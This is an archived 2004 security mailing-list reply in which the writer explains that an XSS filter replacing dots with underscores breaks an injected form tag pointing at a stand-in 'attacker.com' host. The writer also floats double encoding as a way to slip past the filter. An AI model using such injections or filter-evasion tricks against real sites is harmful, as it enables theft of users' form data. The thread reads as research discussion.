mailing list archives
Re: Fullstop Substitution in XSS
From: windo () windowlicker dyn ee
Date: Tue, 1 Jun 2004 09:03:04 +0300
My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script"> is of course being filtered
into: <form target="http://attacker_com/path/to/script">
Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering, obviously).
Of course i dont know how the substitution works, but double encoding like
this MIGHT work:
print.php does what you described in a very basic manner, prints the
input substituting any '.' with '_'.